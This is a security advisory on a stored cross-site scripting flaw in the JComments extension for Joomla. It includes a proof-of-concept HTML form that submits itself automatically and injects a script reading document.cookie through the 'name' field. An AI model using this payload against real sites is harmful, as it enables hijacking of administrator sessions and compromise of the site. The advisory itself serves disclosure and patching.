Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23887
HistoryMay 20, 2010 - 12:00 a.m.

XSS vulnerability in JComments, Joomla

2010-05-2000:00:00
vulners.com
271

Vulnerability ID: HTB22368
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_jcomments_joomla.html
Product: JComments
Vendor: JoomlaTune .com
Vulnerable Version: 2.1.0.0 [07/08/2009] and Probably Prior Versions
Vendor Notification: 04 May 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin.jcomments.php" script to properly sanitize user-supplied input in "name" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form method="POST" action="http://joomla/administrator/index.php&quot; name="main">
<input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'>
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="comment" value="comment text">
<input type="hidden" name="published" value="1">
<input type="hidden" name="option" value="com_jcomments">
<input type="hidden" name="id" value="1">
<input type="hidden" name="task" value="save">
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent verison